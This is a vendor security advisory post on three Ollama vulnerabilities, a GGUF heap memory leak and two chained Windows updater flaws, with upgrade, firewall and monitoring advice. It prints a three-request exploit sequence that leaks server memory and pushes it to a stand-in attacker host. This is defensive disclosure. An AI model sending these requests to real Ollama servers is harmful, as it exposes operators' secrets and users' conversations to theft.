Mondoo

Three Ollama CVEs in One Week: Bleeding Llama Plus Two Windows Updater Flaws Awaiting Release

Three distinct Ollama vulnerabilities surfaced in early May 2026 and most coverage runs them together. CVE-2026-7482 (Bleeding Llama) is a critical unauthenticated heap memory leak in the GGUF loader, fixed in 0.17.1. CVE-2026-42248 and CVE-2026-42249 are two Windows-only auto-updater bugs that chain into persistent code execution. Their fix merged on Ollama's main branch on May 11, 2026, but has not yet shipped in a tagged release. Mondoo Vulnerability Intelligence tracks all three.

Christoph Hartmann
Christoph Hartmann
·8 min read·
Three Ollama CVEs in One Week: Bleeding Llama Plus Two Windows Updater Flaws Awaiting Release

Three new Ollama vulnerabilities landed within days of each other in early May 2026. Most of the press coverage bundles them together, which makes them easy to confuse. They are not the same bug, they affect different platforms, and they require different responses. This post pulls them apart.

What is Ollama?

Ollama is a popular open source runtime for running large language models on your own hardware. You install it on a Mac, a Linux server, or a Windows laptop, pull down a model like Llama 3 or Mistral, and run inference locally instead of calling a hosted API. It is widely used as a backend for tools like Claude Code, Cursor, Continue, and various AI agents.

Ollama exposes a small HTTP API on TCP port 11434. By default that listener is bound to 127.0.0.1, so only software on the same machine can reach it. Many production deployments override this with OLLAMA_HOST=0.0.0.0:11434 so that other servers, IDE plugins, or coworkers can share a single GPU host. That HTTP API is what Bleeding Llama (CVE-2026-7482) attacks. The two Windows updater bugs attack a completely different channel, which is the most important thing to understand before reading on.

The three CVEs at a glance

CVENameReporterSeverityAffected platformsPatch status
CVE-2026-7482Bleeding LlamaCyera ResearchCritical, CVSS 9.1All platforms < 0.17.1Fixed in Ollama 0.17.1
CVE-2026-42248Updater signature bypassStriga, via CERT.PLHigh, CVSS 7.7Windows 0.12.10 through 0.23.2Fix merged on main (PR #16100, May 11, 2026); no tagged release yet
CVE-2026-42249Updater path traversalStriga, via CERT.PLHigh, CVSS 7.7Windows 0.12.10 through 0.23.2Fix merged on main (PR #16100, May 11, 2026); no tagged release yet

The two Windows bugs chain together. The signature bypass lets an attacker substitute the update payload and the path traversal lets that payload land somewhere persistent like the Startup folder. Together they produce silent code execution at the privilege level of the user running Ollama.

Inbound vs outbound: two different attack surfaces

Ollama is involved in two completely separate kinds of network traffic, and each of the new CVEs lives on one side of that line. This is the single most important distinction in this post.

  • Inbound (the inference API). Tools and clients open connections to Ollama on port 11434 to send prompts. Bleeding Llama (CVE-2026-7482) is an attack on this channel. Binding to 127.0.0.1, putting an authenticating proxy in front of port 11434, or firewalling the port off all mitigate it because they make the API unreachable from the attacker.
  • Outbound (the auto-updater). Ollama for Windows reaches out to a vendor update endpoint to download new versions of itself on a schedule. CVE-2026-42248 and CVE-2026-42249 are attacks on this channel. An attacker who can sit on the network path between the laptop and the update endpoint (hostile Wi-Fi, DNS poisoning, a compromised proxy, a captive portal) serves a malicious response. The exploit code runs inside Ollama on the victim's machine.

Localhost binding does not cover the updater bugs. It is the right move for Bleeding Llama, but it does nothing for CVE-2026-42248 and CVE-2026-42249, because those are outbound attacks. The vulnerable code runs inside Ollama on your machine regardless of whether the inference port is exposed.

Why these matter

  • AI runtimes hold sensitive data. A single Ollama instance typically processes source code from coding assistants, system prompts, RAG context, and provider API keys exported as environment variables. Bleeding Llama hands that to an unauthenticated remote attacker.
  • The exposed footprint is large. Internet scans cited in the original disclosure put the number of Ollama servers reachable on 0.0.0.0:11434 without authentication at roughly 300,000.
  • Detection takes more than a CVE feed. Bleeding Llama was fixed in 0.17.1 on February 24, 2026, but a CVE was not assigned until April 28, leaving about two months in which NVD-driven scanners had nothing to alert on. The Windows updater fix landed on main on May 11 but has not yet shipped in a tagged release, so a release-notes-only check still does not catch it.
  • Upgrading Bleeding Llama does not close the updater bugs. The Windows updater code path is present in every release from 0.12.10 through the current latest tagged release, v0.23.2, including the 0.17.1 build that fixes Bleeding Llama.

CVE-2026-7482, "Bleeding Llama", is the memory leak

Discovered by Dor Attias of Cyera Research, this is the bug that Ollama has already fixed. It is a heap out-of-bounds read in the GGUF model loader. An unauthenticated attacker who can reach the Ollama HTTP API can leak the entire process memory of the server, including environment variables, API keys, system prompts, and other users' conversations.

How it works

Ollama uses the GGUF format for model files. Each tensor in a GGUF file declares its shape, data type, and offset, and Ollama trusts these declarations. The /api/create endpoint accepts a GGUF blob and walks each tensor for quantization. The conversion goes through WriteTo in server/quantization.go, which calls ggml.ConvertToF32 in fs/ggml/gguf.go. ConvertToF32 allocates a destination F32 buffer sized from the declared shape and then reads exactly tensor.Elements() values from the source pointer. There is no check that tensor.Elements() matches the size of the tensor's actual data in the file.

An attacker can declare a tiny F16 tensor on disk but set its shape to a million elements. The loop reads megabytes past the end of the mapped buffer into adjacent heap memory, and writes the result into the destination F32 buffer. Because F16 to F32 is a lossless widening, every byte of leaked heap survives the conversion intact and ends up in a new model file on disk.

The three-call exploit

Http
POST /api/blobs/sha256:<digest>
<crafted GGUF: F16 tensor with shape 1,000,000 but only a few bytes of real data>
POST /api/create
{"model": "attacker.example.com/leaks/run1:latest",
"files": [{"path": "sha256:<digest>"}],
"quantize": "f32"}
POST /api/push
{"model": "attacker.example.com/leaks/run1:latest"}

Step 2 triggers the out-of-bounds read and writes a new model file containing the leaked heap bytes. Step 3 uploads that file to the host named in the model identifier. Repeat to scrape more memory.

Why F16 to F32 matters

Most quantization paths in Ollama are lossy. A lossy quantizer would round or truncate the leaked bytes before writing them out. The F16 to F32 path is the only commonly available conversion that is mathematically lossless, so it preserves every input byte and turns the leak into a clean exfiltration channel.

Status: fixed in 0.17.1

Ollama v0.17.1 shipped on February 24, 2026. The release notes describe feature work (Nemotron support, MLX memory improvements, web search for tool-using models) without a security note, so anyone who skipped the release because nothing in the changelog called for an urgent upgrade is still vulnerable. The Echo CNA assigned CVE-2026-7482 on April 28 and Cyera published the technical writeup on May 2.

CVE-2026-42248 and CVE-2026-42249 are the Windows updater bugs

These two are completely separate from Bleeding Llama. They were reported by Striga and disclosed through CERT Polska after weeks of vendor silence. They affect only the Windows build of Ollama.

CVE-2026-42248: missing signature verification

Ollama for Windows downloads update executables and runs them without verifying signatures. The macOS build does perform this verification. Anyone who can sit between the Ollama installation and the update endpoint (malicious DNS resolver, hostile Wi-Fi, compromised proxy) can substitute an arbitrary executable. CWE-494 (Download of Code Without Integrity Check).

CVE-2026-42249: path traversal in the staging directory

The updater builds the staging directory path from values in the HTTP response headers without sanitizing them. An attacker controlling the update server can include path traversal sequences in those headers. Because the unsanitized value flows into filepath.Join, the staged file lands wherever the attacker chooses. The natural target is the per-user Windows Startup folder. CWE-22 (Path Traversal).

Chained, they produce persistent code execution

Either bug alone is awkward to exploit. Combined, they drop a planted executable into the Startup folder, which runs on every login at the user's privilege level with no prompt the user could refuse, because Ollama for Windows performs automatic updates without user interaction. The attacker needs a position on the network path to the update endpoint, which is well within reach on shared corporate Wi-Fi, hotel networks, conference networks, captive portals, and any environment with controllable DNS.

Status: fix merged on main, not yet in a tagged release

CERT.PL published the advisory on April 29, 2026, after Striga reported the bugs in late January and the standard coordinated process did not progress. The advisory officially lists Ollama for Windows 0.12.10 through 0.17.5 as vulnerable, and Striga's follow-up verification, reported by Help Net Security, found the same vulnerable functions unchanged through v0.22.0.

On May 11, 2026, Ollama maintainer dhiltgen merged PR #16100, "app: harden update flows" on main. The diff implements both halves of the fix in app/updater/updater.go and app/updater/updater_windows.go:

  • CVE-2026-42248: verifyDownload() on Windows is no longer a no-op. It now calls WinVerifyTrustEx with the standard Authenticode action, then walks the signer certificate chain via CryptQueryObject and verifies that the signing organization is exactly Ollama Inc.. A validly signed installer from any other publisher is rejected.
  • CVE-2026-42249: Three new helpers (safeUpdateFilename, ensurePathInDir, updateStageETagDir) reject filenames that contain path separators, ., .., or absolute paths, hash the etag with SHA-256 instead of using it raw, and verify the resulting staged path does not escape the staging directory.

The fix is on main but has not yet shipped in a tagged release. The latest tagged release as of this writing is v0.23.2 from May 7, 2026, which predates the fix. Every Windows build from 0.12.10 through v0.23.2 should be treated as vulnerable. Watch for the next tagged Ollama for Windows release that contains commit 3d5a011a and apply it as soon as it lands.

What to do

The three CVEs need three different responses. Treat them independently.

For CVE-2026-7482 (Bleeding Llama)

  1. Upgrade every Ollama install to 0.17.1 or newer. Pull the latest release from the Ollama GitHub releases page or update via your package manager. Rebuild container images and roll deployments.
  2. Do not bind Ollama to 0.0.0.0 without an authenticating proxy in front. The default 127.0.0.1 is correct. If you need remote access, front the API with Caddy, Nginx with mTLS or basic auth, an API gateway, or a service mesh sidecar.
  3. Rotate secrets that may have been in scope. Assume any pre-0.17.1 Ollama instance reachable from an untrusted network may have leaked the contents of its environment, including provider API keys, vector database credentials, and tool-use tokens.
  4. Inventory exposed instances. Scans should look for TCP/11434 listeners. On Linux, ss -tlnp | grep 11434 is the quick check; on macOS, lsof -nP -iTCP:11434 -sTCP:LISTEN.

For CVE-2026-42248 and CVE-2026-42249 (Windows updater chain)

The fix has merged on main but has not yet shipped in a tagged release, so until that release lands, the goal is to take the vulnerable update path out of reach. Ollama added a built-in toggle for this in v0.17.1 (PR #13512, merged February 23, 2026), so the cleanest mitigation is also the simplest one: turn the auto-downloader off.

  1. Disable auto-downloads in the Ollama app settings (v0.17.1 and later). Open the Ollama tray app, go to Settings, and turn off the Auto-download updates toggle. Per the PR description, when disabled the background updater still checks for updates but skips downloading, and any in-flight download is cancelled immediately. Skipping the download skips the vulnerable code paths in both CVEs. This is the recommended setting for every Windows install until Ollama publishes a security fix that explicitly references CVE-2026-42248 and CVE-2026-42249.

  2. Block the Ollama tray app from reaching the network (fleet-wide enforcement, or pre-0.17.1 hosts). The auto-updater runs out of ollama app.exe (the system tray application), not the ollama.exe CLI. A Defender Firewall rule blocks the update path without disabling local inference. From an elevated PowerShell on each host, or via Group Policy / MDM for fleets:

    Powershell
    New-NetFirewallRule -DisplayName "Block Ollama tray auto-updater" `
    -Direction Outbound `
    -Program "$env:LOCALAPPDATA\Programs\Ollama\ollama app.exe" `
    -Action Block

    This matches the community-tested workaround and leaves ollama pull, model inference, and other CLI commands working. Use this when you cannot rely on a per-user UI setting, for example on managed laptops where users could re-enable the toggle.

  3. Treat untrusted networks as exposure. Until a fix ships, Ollama for Windows installs that connect through hotel Wi-Fi, conference networks, captive portals, or untrusted DNS should be considered at risk every time they reach the update endpoint, regardless of whether the toggle is currently off.

  4. Watch the Startup folders. Per-user (%AppData%\Microsoft\Windows\Start Menu\Programs\Startup) and machine-wide (%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp) are the obvious landing zones for the chained exploit. Add them to your EDR's high-priority watch list if they are not already there.

  5. Apply the next tagged release that contains PR #16100. Disabling auto-downloads is a mitigation, not a fix. The actual fix for both CVEs (commit 3d5a011a) merged on May 11, 2026 but has not yet shipped in a tagged release. Watch Ollama's GitHub releases for the first version after v0.23.2 that includes that commit, then apply it on a controlled rollout before re-enabling auto-downloads or removing the network block.

Prioritize by environment

  • Critical: Any Ollama instance reachable from an untrusted network on port 11434, multi-tenant Ollama hosts, GPU servers running pre-0.17.1 builds, and Windows developer laptops that travel onto untrusted networks.
  • High: Single-tenant Ollama servers behind a firewall; Windows workstations on trusted corporate networks with controlled DNS and update routing.
  • Moderate: macOS and Linux laptops only running Ollama locally on 127.0.0.1. Not exposed to Bleeding Llama and not in scope for the Windows updater bugs. Patch on the next regular cycle.

Detect with Mondoo

Tracking three CVEs across Linux servers, GPU hosts, macOS workstations, Windows laptops, and container images is the kind of fan-out that is easy to get wrong by hand. Mondoo handles it.

  • All three CVEs are tracked in Mondoo Vulnerability Intelligence. CVE-2026-7482, CVE-2026-42248, and CVE-2026-42249 all have entries with version ranges, severity, and remediation guidance.
  • Mondoo continuously inventories Ollama installations across workstations, GPU servers, and container images. Any Linux or macOS host running below 0.17.1 is flagged for Bleeding Llama. Any Windows host running 0.12.10 or later is flagged for both updater CVEs until the first tagged release containing PR #16100 is published, at which point the version range will tighten automatically.
  • Mondoo policies verify configuration, not just versions. Linux services should not be bound to 0.0.0.0 without an authenticating proxy. The systemd unit or container should not export sensitive environment variables into the inference process. Windows installations should have the tray updater's auto-download toggle disabled, or be blocked at the network layer. Mondoo can check all of this on every scan.

Disclosure timeline

DateEvent
Jan 27, 2026Striga reports the Windows updater bugs to Ollama
Feb 2, 2026Cyera reports Bleeding Llama to Ollama
Feb 24, 2026Ollama ships v0.17.1 with the Bleeding Llama fix
Apr 28, 2026Echo CNA assigns CVE-2026-7482
Apr 29, 2026CERT.PL publishes the Windows updater advisory; CVE-2026-42248 and CVE-2026-42249 become public
May 1, 2026CVE-2026-7482 published
May 2, 2026Cyera publishes the technical writeup
May 11, 2026Ollama merges PR #16100 on main, fixing both Windows updater CVEs (Authenticode + signer-org check, plus filename and staging-path sanitization)
May 12, 2026No tagged Ollama release yet contains the fix; v0.23.2 (May 7) remains the latest

Takeaway

Two bugs reported in the same week, two very different disclosure paths. Bleeding Llama was fixed within weeks of the initial report and only later picked up a CVE, so for two months it lived in the changelog as a feature release. The Windows updater chain went public on April 29 with no fix in tree; the fix landed on main on May 11 but has yet to ship in a tagged release as of this writing. Either way, a remediation workflow that depends on CVE feeds catching everything at the right moment, or on release notes calling out the right commit, will miss bugs in this shape. Inventory what is actually installed, verify configuration, and watch the relevant upstream pages directly. We have written about this pattern in The Disclosure Vacuum Is a Remediation Vacuum in Disguise.

References

About the Author

Christoph Hartmann

Christoph Hartmann

Co-Founder & CTO

Christoph Hartmann, co-founder and CTO at Mondoo, wants to make the world more secure. He's long been a leader in security engineering and DevOps, creating widely adopted solutions like Dev-Sec.io and Chef InSpec. For fun, he builds everything from custom operating systems to autonomous robots.

Ready to Get Started?

See how Mondoo can help secure your infrastructure.